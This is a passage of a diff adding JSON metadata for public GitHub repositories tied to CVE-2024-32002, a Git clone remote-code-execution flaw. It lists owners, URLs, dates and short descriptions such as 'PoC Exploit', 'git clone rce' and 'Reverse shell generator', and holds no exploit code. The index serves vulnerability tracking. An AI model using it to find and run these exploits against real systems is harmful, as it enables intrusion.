"jweny", + "id": 26767398, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26767398?v=4", + "html_url": "https:\/\/github.com\/jweny", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jweny\/CVE-2024-32002_EXP", + "description": null, + "fork": false, + "created_at": "2024-05-20T02:58:57Z", + "updated_at": "2024-06-03T15:35:41Z", + "pushed_at": "2024-05-20T07:26:49Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 803132723, + "name": "CVE-2024-32002_EXP", + "full_name": "CrackerCat\/CVE-2024-32002_EXP", + "owner": { + "login": "CrackerCat", + "id": 17995064, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17995064?v=4", + "html_url": "https:\/\/github.com\/CrackerCat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CrackerCat\/CVE-2024-32002_EXP", + "description": null, + "fork": false, + "created_at": "2024-05-20T06:12:02Z", + "updated_at": "2024-05-20T08:13:06Z", + "pushed_at": "2024-05-20T03:17:39Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 803811564, + "name": "hook", + "full_name": "Roronoawjd\/hook", + "owner": { + "login": "Roronoawjd", + "id": 105417063, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105417063?v=4", + "html_url": "https:\/\/github.com\/Roronoawjd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Roronoawjd\/hook", + "description": "CVE-2024-32002 hook POC", + "fork": false, + "created_at": "2024-05-21T12:31:57Z", + "updated_at": "2024-05-21T12:36:15Z", + "pushed_at": "2024-05-21T12:36:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 803835949, + "name": "git_rce", + "full_name": "Roronoawjd\/git_rce", + "owner": { + "login": "Roronoawjd", + "id": 105417063, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105417063?v=4", + "html_url": "https:\/\/github.com\/Roronoawjd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Roronoawjd\/git_rce", + "description": "CVE-2024-32002 POC", + "fork": false, + "created_at": "2024-05-21T13:19:15Z", + "updated_at": "2024-05-23T11:24:50Z", + "pushed_at": "2024-05-23T11:24:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 803851228, + "name": "CVE-2024-32002-Reverse-Shell", + "full_name": "JJoosh\/CVE-2024-32002-Reverse-Shell", + "owner": { + "login": "JJoosh", + "id": 122099216, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122099216?v=4", + "html_url": "https:\/\/github.com\/JJoosh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JJoosh\/CVE-2024-32002-Reverse-Shell", + "description": "Este script demuestra cómo explotar la vulnerabilidad CVE-2024-32002 para obtener una reverse shell, proporcionando acceso remoto al sistema afectado. Úselo con precaución en entornos controlados y solo con fines educativos o de pruebas de seguridad.", + "fork": false, + "created_at": "2024-05-21T13:45:58Z", + "updated_at": "2024-05-23T15:14:13Z", + "pushed_at": "2024-05-21T14:01:26Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 804285979, + "name": "CVE-2024-32002-poc", + "full_name": "1mxml\/CVE-2024-32002-poc", + "owner": { + "login": "1mxml", + "id": 94277520, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94277520?v=4", + "html_url": "https:\/\/github.com\/1mxml", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/1mxml\/CVE-2024-32002-poc", + "description": null, + "fork": false, + "created_at": "2024-05-22T10:01:58Z", + "updated_at": "2024-05-22T10:02:02Z", + "pushed_at": "2024-05-22T10:01:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 804311936, + "name": "CVE-2024-32002-hook", + "full_name": "bfengj\/CVE-2024-32002-hook", + "owner": { + "login": "bfengj", + "id": 63182771, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63182771?v=4", + "html_url": "https:\/\/github.com\/bfengj", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bfengj\/CVE-2024-32002-hook", + "description": null, + "fork": false, + "created_at": "2024-05-22T11:05:48Z", + "updated_at": "2024-05-22T11:07:24Z", + "pushed_at": "2024-05-22T11:07:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 804320454, + "name": "CVE-2024-32002-hulk", + "full_name": "ycdxsb\/CVE-2024-32002-hulk", + "owner": { + "login": "ycdxsb", + "id": 32149596, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32149596?v=4", + "html_url": "https:\/\/github.com\/ycdxsb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ycdxsb\/CVE-2024-32002-hulk", + "description": null, + "fork": false, + "created_at": "2024-05-22T11:26:30Z", + "updated_at": "2024-05-22T11:32:40Z", + "pushed_at": "2024-05-22T11:32:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 804320768, + "name": "CVE-2024-32002-submod", + "full_name": "ycdxsb\/CVE-2024-32002-submod", + "owner": { + "login": "ycdxsb", + "id": 32149596, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32149596?v=4", + "html_url": "https:\/\/github.com\/ycdxsb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ycdxsb\/CVE-2024-32002-submod", + "description": null, + "fork": false, + "created_at": "2024-05-22T11:27:14Z", + "updated_at": "2024-05-22T11:32:58Z", + "pushed_at": "2024-05-22T11:32:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 804323007, + "name": "CVE-2024-32002-Exploit", + "full_name": "bfengj\/CVE-2024-32002-Exploit", + "owner": { + "login": "bfengj", + "id": 63182771, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63182771?v=4", + "html_url": "https:\/\/github.com\/bfengj", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bfengj\/CVE-2024-32002-Exploit", + "description": null, + "fork": false, + "created_at": "2024-05-22T11:32:33Z", + "updated_at": "2024-05-29T01:55:16Z", + "pushed_at": "2024-05-22T11:39:37Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 804523151, + "name": "CVE-2024-32002", + "full_name": "vincepsh\/CVE-2024-32002", + "owner": { + "login": "vincepsh", + "id": 60623403, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60623403?v=4", + "html_url": "https:\/\/github.com\/vincepsh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vincepsh\/CVE-2024-32002", + "description": "Repo for testing CVE-2024-32002", + "fork": false, + "created_at": "2024-05-22T18:43:36Z", + "updated_at": "2024-05-22T21:16:26Z", + "pushed_at": "2024-05-22T21:16:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 804525927, + "name": "CVE-2024-32002-hook", + "full_name": "vincepsh\/CVE-2024-32002-hook", + "owner": { + "login": "vincepsh", + "id": 60623403, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60623403?v=4", + "html_url": "https:\/\/github.com\/vincepsh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vincepsh\/CVE-2024-32002-hook", + "description": "CVE-2024-32002-hook", + "fork": false, + "created_at": "2024-05-22T18:50:56Z", + "updated_at": "2024-05-22T18:57:39Z", + "pushed_at": "2024-05-22T18:57:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 804616476, + "name": "CVE-2024-32002", + "full_name": "JJoosh\/CVE-2024-32002", + "owner": { + "login": "JJoosh", + "id": 122099216, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122099216?v=4", + "html_url": "https:\/\/github.com\/JJoosh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JJoosh\/CVE-2024-32002", + "description": "This is the main repository for CVE 2024-32002, and requires recursive cloning because it contains the submodels necessary for execution.", + "fork": false, + "created_at": "2024-05-22T23:49:22Z", + "updated_at": "2024-08-27T20:46:18Z", + "pushed_at": "2024-05-22T23:55:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 804686415, + "name": "CVE-2024-32002-EXP", + "full_name": "10cks\/CVE-2024-32002-EXP", + "owner": { + "login": "10cks", + "id": 47177550, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47177550?v=4", + "html_url": "https:\/\/github.com\/10cks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/10cks\/CVE-2024-32002-EXP", + "description": null, + "fork": false, + "created_at": "2024-05-23T04:25:51Z", + "updated_at": "2024-05-23T05:05:20Z", + "pushed_at": "2024-05-23T04:26:52Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 804727102, + "name": "CVE-2024-32002", + "full_name": "WOOOOONG\/CVE-2024-32002", + "owner": { + "login": "WOOOOONG", + "id": 40143329, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40143329?v=4", + "html_url": "https:\/\/github.com\/WOOOOONG", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/WOOOOONG\/CVE-2024-32002", + "description": "PoC Exploit for CVE-2024-32002", + "fork": false, + "created_at": "2024-05-23T06:38:34Z", + "updated_at": "2024-05-23T06:55:05Z", + "pushed_at": "2024-05-23T06:55:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 804727245, + "name": "hook", + "full_name": "WOOOOONG\/hook", + "owner": { + "login": "WOOOOONG", + "id": 40143329, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40143329?v=4", + "html_url": "https:\/\/github.com\/WOOOOONG", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/WOOOOONG\/hook", + "description": "PoC Exploit for CVE-2024-32002", + "fork": false, + "created_at": "2024-05-23T06:38:56Z", + "updated_at": "2024-05-23T06:54:49Z", + "pushed_at": "2024-05-23T06:54:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 804756776, + "name": "poc-cve-2024-32002", + "full_name": "fadhilthomas\/poc-cve-2024-32002", + "owner": { + "login": "fadhilthomas", + "id": 29804796, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29804796?v=4", + "html_url": "https:\/\/github.com\/fadhilthomas", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fadhilthomas\/poc-cve-2024-32002", + "description": "poc of git rce using cve-2024-32002", + "fork": false, + "created_at": "2024-05-23T07:56:05Z", + "updated_at": "2024-05-26T19:44:08Z", + "pushed_at": "2024-05-24T10:39:48Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2024-32002", + "git", + "rce" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 805294860, + "name": "hook", + "full_name": "fadhilthomas\/hook", + "owner": { + "login": "fadhilthomas", + "id": 29804796, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29804796?v=4", + "html_url": "https:\/\/github.com\/fadhilthomas", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fadhilthomas\/hook", + "description": "part of poc cve-2024-32002", + "fork": false, + "created_at": "2024-05-24T09:23:42Z", + "updated_at": "2024-05-24T11:10:46Z", + "pushed_at": "2024-05-24T10:05:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2024-32002", + "git", + "rce" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 805740767, + "name": "cve-2024-32002-submodule-aw", + "full_name": "JakobTheDev\/cve-2024-32002-submodule-aw", + "owner": { + "login": "JakobTheDev", + "id": 21337744, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21337744?v=4", + "html_url": "https:\/\/github.com\/JakobTheDev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JakobTheDev\/cve-2024-32002-submodule-aw", + "description": "A submodule to demonstrate CVE-2024-32002. Demonstrates arbitrary write into .git.", + "fork": false, + "created_at": "2024-05-25T10:29:13Z", + "updated_at": "2024-05-25T12:20:27Z", + "pushed_at": "2024-05-25T12:08:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 805741257, + "name": "cve-2024-32002-poc-aw", + "full_name": "JakobTheDev\/cve-2024-32002-poc-aw", + "owner": { + "login": "JakobTheDev", + "id": 21337744, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21337744?v=4", + "html_url": "https:\/\/github.com\/JakobTheDev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JakobTheDev\/cve-2024-32002-poc-aw", + "description": "A POC for CVE-2024-32002 demonstrating arbitrary write into the .git directory.", + "fork": false, + "created_at": "2024-05-25T10:30:57Z", + "updated_at": "2024-05-25T12:20:17Z", + "pushed_at": "2024-05-25T12:14:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 806888145, + "name": "CVE-2024-32002-git-rce", + "full_name": "Goplush\/CVE-2024-32002-git-rce", + "owner": { + "login": "Goplush", + "id": 81841745, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81841745?v=4", + "html_url": "https:\/\/github.com\/Goplush", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Goplush\/CVE-2024-32002-git-rce", + "description": null, + "fork": false, + "created_at": "2024-05-28T05:27:23Z", + "updated_at": "2024-06-01T06:27:38Z", + "pushed_at": "2024-05-28T07:41:35Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 807969410, + "name": "rcetest", + "full_name": "431m\/rcetest", + "owner": { + "login": "431m", + "id": 71336091, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71336091?v=4", + "html_url": "https:\/\/github.com\/431m", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/431m\/rcetest", + "description": "CVE-2024-32002 poc test", + "fork": false, + "created_at": "2024-05-30T06:08:33Z", + "updated_at": "2024-06-03T04:13:19Z", + "pushed_at": "2024-05-30T06:17:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 808410272, + "name": "CVE-2024-32002", + "full_name": "AD-Appledog\/CVE-2024-32002", + "owner": { + "login": "AD-Appledog", + "id": 94734520, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94734520?v=4", + "html_url": "https:\/\/github.com\/AD-Appledog", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AD-Appledog\/CVE-2024-32002", + "description": "CVE-2024-32002wakuwaku", + "fork": false, + "created_at": "2024-05-31T02:40:31Z", + "updated_at": "2024-05-31T02:54:23Z", + "pushed_at": "2024-05-31T02:54:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 808411710, + "name": "wakuwaku", + "full_name": "AD-Appledog\/wakuwaku", + "owner": { + "login": "AD-Appledog", + "id": 94734520, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94734520?v=4", + "html_url": "https:\/\/github.com\/AD-Appledog", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AD-Appledog\/wakuwaku", + "description": "cve-2024-32002yahhh", + "fork": false, + "created_at": "2024-05-31T02:45:44Z", + "updated_at": "2024-09-06T08:37:09Z", + "pushed_at": "2024-09-06T08:37:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 809009313, + "name": "cve_2024_32002", + "full_name": "tobelight\/cve_2024_32002", + "owner": { + "login": "tobelight", + "id": 131186949, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/131186949?v=4", + "html_url": "https:\/\/github.com\/tobelight", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tobelight\/cve_2024_32002", + "description": "https:\/\/www.cve.org\/CVERecord?id=CVE-2024-32002", + "fork": false, + "created_at": "2024-06-01T12:27:50Z", + "updated_at": "2024-06-01T12:30:39Z", + "pushed_at": "2024-06-01T12:30:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 809142955, + "name": "CVE-2024-32002-PoC_Chinese", + "full_name": "Basyaact\/CVE-2024-32002-PoC_Chinese", + "owner": { + "login": "Basyaact", + "id": 49944732, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49944732?v=4", + "html_url": "https:\/\/github.com\/Basyaact", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Basyaact\/CVE-2024-32002-PoC_Chinese", + "description": "none", + "fork": false, + "created_at": "2024-06-01T20:19:05Z", + "updated_at": "2024-09-05T11:14:54Z", + "pushed_at": "2024-06-05T20:10:45Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823532806, + "name": "git_rce", + "full_name": "EQSTLab\/git_rce", + "owner": { + "login": "EQSTLab", + "id": 148991397, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148991397?v=4", + "html_url": "https:\/\/github.com\/EQSTLab", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EQSTLab\/git_rce", + "description": "git clone rce CVE-2024-32002", + "fork": false, + "created_at": "2024-07-03T08:01:39Z", + "updated_at": "2024-10-31T20:50:27Z", + "pushed_at": "2024-07-09T01:52:48Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 825352916, + "name": "CVE-2024-32002-hook", + "full_name": "sysonlai\/CVE-2024-32002-hook", + "owner": { + "login": "sysonlai", + "id": 23263310, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23263310?v=4", + "html_url": "https:\/\/github.com\/sysonlai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sysonlai\/CVE-2024-32002-hook", + "description": null, + "fork": false, + "created_at": "2024-07-07T14:50:23Z", + "updated_at": "2024-07-07T15:06:42Z", + "pushed_at": "2024-07-07T15:06:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 831254914, + "name": "CVE-2024-32002-git-rce-father-poc", + "full_name": "TSY244\/CVE-2024-32002-git-rce-father-poc", + "owner": { + "login": "TSY244", + "id": 115205751, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115205751?v=4", + "html_url": "https:\/\/github.com\/TSY244", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TSY244\/CVE-2024-32002-git-rce-father-poc", + "description": null, + "fork": false, + "created_at": "2024-07-20T03:59:35Z", + "updated_at": "2024-07-20T03:59:43Z", + "pushed_at": "2024-07-20T03:59:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 831261401, + "name": "CVE-2024-32002-git-rce", + "full_name": "TSY244\/CVE-2024-32002-git-rce", + "owner": { + "login": "TSY244", + "id": 115205751, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115205751?v=4", + "html_url": "https:\/\/github.com\/TSY244", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TSY244\/CVE-2024-32002-git-rce", + "description": null, + "fork": false, + "created_at": "2024-07-20T04:31:26Z", + "updated_at": "2024-07-20T04:31:34Z", + "pushed_at": "2024-07-20T04:31:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 834651199, + "name": "CVE-2024-32002", + "full_name": "blackninja23\/CVE-2024-32002", + "owner": { + "login": "blackninja23", + "id": 78839207, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78839207?v=4", + "html_url": "https:\/\/github.com\/blackninja23", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/blackninja23\/CVE-2024-32002", + "description": null, + "fork": false, + "created_at": "2024-07-27T23:44:25Z", + "updated_at": "2024-07-27T23:56:40Z", + "pushed_at": "2024-07-27T23:56:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 834840343, + "name": "CVE-2024-32002", + "full_name": "daemon-reconfig\/CVE-2024-32002", + "owner": { + "login": "daemon-reconfig", + "id": 69844188, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69844188?v=4", + "html_url": "https:\/\/github.com\/daemon-reconfig", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/daemon-reconfig\/CVE-2024-32002", + "description": "A Reverse shell generator for gitlab-shell vulnerability cve 2024-32002", + "fork": false, + "created_at": "2024-07-28T14:22:01Z", + "updated_at": "2024-08-02T09:25:53Z", + "pushed_at": "2024-08-02T09:25:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 835173287, + "name": "CVE-2024-32002", + "full_name": "charlesgargasson\/CVE-2024-32002", + "owner": { + "login": "charlesgargasson", + "id": 26895987, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26895987?v=4", + "html_url": "https:\/\/github.com\/charlesgargasson", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/charlesgargasson\/CVE-2024-32002", + "description": "GIT RCE CVE-2024-32002", + "fork": false, + "created_at": "2024-07-29T10:00:41Z", + "updated_at": "2024-11-16T10:58:35Z", + "pushed_at": "2024-07-30T23:27:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-32002", + "exploit", + "htb", + "linux", + "poc", + "windows" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 835802048, + "name": "CVE-2024-32002-PoC", + "full_name": "NishanthAnand21\/CVE-2024-32002-PoC", + "owner": { + "login": "NishanthAnand21", + "id": 87749392, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87749392?v=4", + "html_url": "https:\/\/github.com\/NishanthAnand21", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NishanthAnand21\/CVE-2024-32002-PoC", + "description": "PoC of CVE-2024-32002 - Remote Code Execution while cloning special-crafted local repositories", + "fork": false, + "created_at": "2024-07-30T14:58:00Z", + "updated_at": "2024-07-30T16:55:11Z", + "pushed_at": "2024-07-30T16:01:17Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 835952440, + "name": "CVE-2024-32002", + "full_name": "FlojBoj\/CVE-2024-32002", + "owner": { + "login": "FlojBoj", + "id": 170850781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/170850781?v=4", + "html_url": "https:\/\/github.com\/FlojBoj", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FlojBoj\/CVE-2024-32002", + "description": null, + "fork": false, + "created_at": "2024-07-30T21:22:29Z", + "updated_at": "2024-09-02T15:21:46Z", + "pushed_at": "2024-09-02T15:21:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 835980205, + "name": "CVE-2024-32002", + "full_name": "tiyeume25112004\/CVE-2024-32002", + "owner": { + "login": "tiyeume25112004", + "id": 77606941, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77606941?v=4", + "html_url": "https:\/\/github.com\/tiyeume25112004", + "user_view_type": "public" + }, + "html_url": 